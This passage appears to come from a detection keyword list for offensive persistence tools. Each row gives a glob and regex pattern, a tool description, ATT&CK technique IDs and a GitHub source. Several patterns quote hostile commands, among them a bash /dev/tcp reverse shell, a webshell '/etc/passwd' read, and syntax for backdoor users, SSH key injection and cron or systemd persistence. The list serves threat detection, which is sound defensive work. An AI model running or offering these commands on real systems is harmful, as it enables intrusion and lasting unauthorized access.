72* Waitfor-Persistence.ps1*.{0,1000}\sWaitfor\-Persistence\.ps1.{0,1000}offensive_tool_keywordWaitfor-PersistenceUse Waitfor.exe to maintain persistenceT1059 - T1117 - T1053.005 - T1546.013TA0002 - TA0003N/AN/APersistencehttps://github.com/3gstudent/Waitfor-Persistence10N/AN/A9154192021-04-17T01:41:42Z2017-06-07T09:33:13Z3689
73* WinPirate.bat*.{0,1000}\sWinPirate\.bat.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z3730
74* XRulez.cpp*.{0,1000}\sXRulez\.cpp.{0,1000}offensive_tool_keywordXrulezXRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.T1078 - T1105 - T1059 - T1566TA0002 - TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/FSecureLABS/Xrulez10N/AN/A102162452018-12-11T16:33:08Z2016-08-31T10:10:10Z3783
75*"NSA0XF$"*.{0,1000}\"NSA0XF\$\".{0,1000}offensive_tool_keyworddoucmeleverages the NetUserAdd Win32 API to create a new computer accountT1136 - T1098 - T1078TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Ben0xA/DoUCMe10N/AN/A9169182021-05-01T03:15:59Z2021-04-29T15:41:28Z3857
76*"ServiceName = ""unstoppable"*.{0,1000}\"ServiceName\s\=\s\"unstoppable\".{0,1000}offensive_tool_keywordUnstoppableServicea Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interfaceT1543.003 - T1564.001 - T1490TA0003 - TA0005N/AN/APersistencehttps://github.com/malcomvetter/UnstoppableService10#servicenameN/A5166152019-01-19T22:38:18Z2018-08-07T22:11:22Z3868
77*"small web shell by zaco*.{0,1000}\"small\sweb\sshell\sby\szaco.{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10N/Aphp title webshell71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z3871
78*"WorkstationName">RULER</Data>*.{0,1000}\"WorkstationName\"\>RULER\<\/Data\>.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler10N/AN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z3882
79*# If got a malicious packet - Activate the backdoor!*.{0,1000}\#\sIf\sgot\sa\smalicious\spacket\s\-\sActivate\sthe\sbackdoor!.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman10N/AN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z3894
80*# Pop up the calculator when you start excel.exe*.{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\sexcel\.exe.{0,1000}offensive_tool_keywordOffice-PersistenceUse powershell to test Office-based persistence methodsT1059.001 - T1137 - T1116TA0003 N/AN/APersistencehttps://github.com/3gstudent/Office-Persistence10N/AN/A9176242021-04-17T01:39:13Z2017-07-14T10:03:35Z3903
81*# Pop up the calculator when you start powerpoint.exe*.{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\spowerpoint\.exe.{0,1000}offensive_tool_keywordOffice-PersistenceUse powershell to test Office-based persistence methodsT1059.001 - T1137 - T1116TA0003 N/AN/APersistencehttps://github.com/3gstudent/Office-Persistence10N/AN/A9176242021-04-17T01:39:13Z2017-07-14T10:03:35Z3904
82*# Pop up the calculator when you start winword.exe*.{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\swinword\.exe.{0,1000}offensive_tool_keywordOffice-PersistenceUse powershell to test Office-based persistence methodsT1059.001 - T1137 - T1116TA0003 N/AN/APersistencehttps://github.com/3gstudent/Office-Persistence10N/AN/A9176242021-04-17T01:39:13Z2017-07-14T10:03:35Z3905
83*# Sticky Keys backdoor exists*.{0,1000}\#\sSticky\sKeys\sbackdoor\sexists.{0,1000}offensive_tool_keywordPersistence-Accessibility-Featuresautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/Ignitetechnologies/Persistence-Accessibility-Features10N/AN/A9134122020-05-18T05:59:58Z2020-05-18T05:59:23Z3909
84*#!/bin/bash\n/bin/bash -c 'sh -i >& /dev/tcp/*/* 0>&1*.{0,1000}\#!\/bin\/bash\\n\/bin\/bash\s\-c\s\'sh\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z3912
85*$calcwllx64 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4*.{0,1000}\$calcwllx64\s\=\s\"TVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\+AAAAA4.{0,1000}offensive_tool_keywordOffice-PersistenceUse powershell to test Office-based persistence methodsT1059.001 - T1137 - T1116TA0003 N/AN/APersistencehttps://github.com/3gstudent/Office-Persistence10N/AN/A9176242021-04-17T01:39:13Z2017-07-14T10:03:35Z3951
86*$calcwllx86 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4*.{0,1000}\$calcwllx86\s\=\s\"TVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4.{0,1000}offensive_tool_keywordOffice-PersistenceUse powershell to test Office-based persistence methodsT1059.001 - T1137 - T1116TA0003 N/AN/APersistencehttps://github.com/3gstudent/Office-Persistence10N/AN/A9176242021-04-17T01:39:13Z2017-07-14T10:03:35Z3952
87*%APPDATA%/Indexing.*.{0,1000}\%APPDATA\%\/Indexing\..{0,1000}offensive_tool_keywordJunctionFolderCreates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.T1547.001 - T1574.001 - T1204.002TA0005 - TA0004N/AN/APersistencehttps://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder10N/AN/A101014162502023-02-06T14:56:26Z2019-02-06T00:32:29Z4031
88*./backdoor.sh *.{0,1000}\.\/backdoor\.sh\s.{0,1000}offensive_tool_keywordlinux-pam-backdoorLinux PAM BackdoorT1547.001 - T1556.003TA0003 - TA0004N/AN/APersistencehttps://github.com/zephrax/linux-pam-backdoor10#linuxN/A104328852023-11-13T11:29:44Z2017-06-08T21:14:34Z4108
89*./dropbear *.{0,1000}\.\/dropbear\s.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#linuxN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z4128
90*./dynasty.sh*.{0,1000}\.\/dynasty\.sh.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist11#linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z4129
91*.bashrc persistence setup successfully*.{0,1000}\.bashrc\spersistence\ssetup\ssuccessfully.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell10#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z4256
92*.exe -group=remote -computername=*.{0,1000}\.exe\s\s\-group\=remote\s\-computername\=.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/Afp risks101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z4322
93*.exe /method:create /taskname:*.{0,1000}\.exe\s\/method\:create\s\/taskname\:.{0,1000}offensive_tool_keywordScheduleRunnerA C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operationT1210 - T1570 - T1021 - T1550TA0008N/AN/APersistencehttps://github.com/netero1010/ScheduleRunner10N/AN/A94336462025-01-22T02:06:59Z2021-10-12T15:27:32Z4340
94*.exe /method:create /taskname:* /trigger:* /modifier:* /program:* /argument:*.dll /remoteserver:*.{0,1000}\.exe\s\/method\:create\s\/taskname\:.{0,1000}\s\/trigger\:.{0,1000}\s\/modifier\:.{0,1000}\s\/program\:.{0,1000}\s\/argument\:.{0,1000}\.dll\s\/remoteserver\:.{0,1000}offensive_tool_keywordScheduleRunnerA C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operationT1210 - T1570 - T1021 - T1550TA0008N/AN/APersistencehttps://github.com/netero1010/ScheduleRunner10N/AN/A94336462025-01-22T02:06:59Z2021-10-12T15:27:32Z4341
95*.exe /method:delete /taskname:* /technique:hide*.{0,1000}\.exe\s\/method\:delete\s\/taskname\:.{0,1000}\s\/technique\:hide.{0,1000}offensive_tool_keywordScheduleRunnerA C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operationT1210 - T1570 - T1021 - T1550TA0008N/AN/APersistencehttps://github.com/netero1010/ScheduleRunner10N/AN/A94336462025-01-22T02:06:59Z2021-10-12T15:27:32Z4342
96*.exe /method:edit /taskname:Cleanup*.{0,1000}\.exe\s\/method\:edit\s\/taskname\:Cleanup.{0,1000}offensive_tool_keywordScheduleRunnerA C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operationT1210 - T1570 - T1021 - T1550TA0008N/AN/APersistencehttps://github.com/netero1010/ScheduleRunner10N/AN/A94336462025-01-22T02:06:59Z2021-10-12T15:27:32Z4343
97*.exe action=create * service=* displayname=* binpath=**.{0,1000}\.exe\saction\=create\s.{0,1000}\sservice\=.{0,1000}\sdisplayname\=.{0,1000}\sbinpath\=.{0,1000}.{0,1000}offensive_tool_keywordSharpSC.NET assembly to interact with services. (included in powershell empire)T1543.003TA0003N/AN/APersistencehttps://github.com/djhohnstein/SharpSC10N/AN/A814062019-09-27T23:04:24Z2019-09-24T21:05:38Z4366
98*.exe action=GetScheduledTaskCOMHandler*.{0,1000}\.exe\saction\=GetScheduledTaskCOMHandler.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z4370
99*.exe action=ListRunningServices*.{0,1000}\.exe\saction\=ListRunningServices.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z4371
100*.exe action=ListScheduledTasks*.{0,1000}\.exe\saction\=ListScheduledTasks.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z4372
101*.exe action=ListTaskNames*.{0,1000}\.exe\saction\=ListTaskNames.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z4373
102*.exe --eventviewer *.exe*.{0,1000}\.exe\s\-\-eventviewer\s.{0,1000}\.exe.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z4438
103*.exe -group=all *.{0,1000}\.exe\s\-group\=all\s.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/Afp risks101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z4460
104*.exe -group=all -AuditPolicies*.{0,1000}\.exe\s\-group\=all\s\-AuditPolicies.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/AN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z4461
105*.exe -group=all -full*.{0,1000}\.exe\s\-group\=all\s\-full.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/Afp risks101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z4462
106*.exe -group=remote *.{0,1000}\.exe\s\-group\=remote\s.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/Afp risks101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z4463
107*.exe -group=system *.{0,1000}\.exe\s\-group\=system\s.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/Afp risks101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z4464
108*.exe -group=user *.{0,1000}\.exe\s\-group\=user\s.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/Afp risks101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z4465
109*.exe NonstandardProcesses*.{0,1000}\.exe\sNonstandardProcesses.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/AN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z4543
110*.exe NTLMSettings*.{0,1000}\.exe\sNTLMSettings.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/AN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z4566
111*.exe --pwsh *.ps1 *.exe*.{0,1000}\.exe\s\-\-pwsh\s.{0,1000}\.ps1\s.{0,1000}\.exe.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z4578
112*.exe -q InterestingProcesses*.{0,1000}\.exe\s\-q\sInterestingProcesses.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/AN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z4579
113*.exe -q PowerShell*.{0,1000}\.exe\s\-q\sPowerShell.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/AN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z4580
114*.exe -q WindowsDefender*.{0,1000}\.exe\s\-q\sWindowsDefender.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/AN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z4581
115*.exe --schedule * *.exe*.{0,1000}\.exe\s\-\-schedule\s.{0,1000}\s.{0,1000}\.exe.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z4602
116*.exe --screensaver *:\*.exe*.{0,1000}\.exe\s\-\-screensaver\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z4603
117*.exe Search Find-Persist*.{0,1000}\.exe\sSearch\sFind\-Persist.{0,1000}offensive_tool_keywordCOM-HunterCOM-hunter is a COM Hijacking persistnce tool written in C#T1122 - T1055.012TA0003 - TA0005N/AN/APersistencehttps://github.com/nickvourd/COM-Hunter10N/AN/A103289482025-03-11T04:49:55Z2022-05-26T19:34:59Z4604
118*.exe --startup *:\*.exe*.{0,1000}\.exe\s\-\-startup\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z4622
119*.exe -t keepass -f *.{0,1000}\.exe\s\-t\skeepass\s\-f\s.{0,1000}offensive_tool_keywordSharPersistSharPersist Windows persistence toolkit written in C#.T1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/fireeye/SharPersist10N/AN/A101014602572023-08-11T00:52:09Z2019-06-21T13:32:14Z4624
120*.exe -t startupfolder -c * -a * -f*.{0,1000}\.exe\s\-t\sstartupfolder\s\-c\s.{0,1000}\s\-a\s.{0,1000}\s\-f.{0,1000}offensive_tool_keywordSharPersistSharPersist Windows persistence toolkit written in C#.T1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/fireeye/SharPersist10N/AN/A101014602572023-08-11T00:52:09Z2019-06-21T13:32:14Z4625
121*.exe -t tortoisesvn -c * -a * -m*.{0,1000}\.exe\s\-t\stortoisesvn\s\-c\s.{0,1000}\s\-a\s.{0,1000}\s\-m.{0,1000}offensive_tool_keywordSharPersistSharPersist Windows persistence toolkit written in C#.T1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/fireeye/SharPersist10N/AN/A101014602572023-08-11T00:52:09Z2019-06-21T13:32:14Z4626
122*.exe --winlogon * *:\*.exe*.{0,1000}\.exe\s\-\-winlogon\s.{0,1000}\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z4643
123*.exe --wmi *:\*.exe*.{0,1000}\.exe\s\-\-wmi\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z4644
124*.php?cmd=cat+/etc/passwd*.{0,1000}\.php\?cmd\=cat\+\/etc\/passwd.{0,1000}offensive_tool_keywordwebshellA collection of webshellT1505.003 - T1100 - T1190 - T1505.004TA0003 - TA0011 N/AN/APersistencehttps://github.com/Peaky-XD/webshell11#linuxN/A101N/AN/AN/AN/A4733
125*.sh --at --custom --command * --time *.{0,1000}\.sh\s\-\-at\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-time\s.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z4888
126*.sh --authorized-keys --custom --key *.ssh/authorized_keys*.{0,1000}\.sh\s\-\-authorized\-keys\s\-\-custom\s\-\-key\s.{0,1000}\.ssh\/authorized_keys.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z4889
127*.sh --backdoor-user --username *.{0,1000}\.sh\s\-\-backdoor\-user\s\-\-username\s.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z4890
128*.sh --cron --custom --command * --crond --name *.{0,1000}\.sh\s\-\-cron\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-crond\s\-\-name\s.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z4891
129*.sh --cron --custom --command * --crontab*.{0,1000}\.sh\s\-\-cron\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-crontab.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z4892
130*.sh --cron --custom --command * --daily --name *.{0,1000}\.sh\s\-\-cron\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-daily\s\-\-name\s.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z4893
131*.sh --passwd-user --custom --passwd-string *.{0,1000}\.sh\s\-\-passwd\-user\s\-\-custom\s\-\-passwd\-string\s.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z4897
132*.sh --shell-profile --custom --command * --path */.bash_profile*.{0,1000}\.sh\s\-\-shell\-profile\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-path\s.{0,1000}\/\.bash_profile.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z4898
133*.sh --systemd --custom --command *.{0,1000}\.sh\s\-\-systemd\s\-\-custom\s\-\-command\s.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z4899
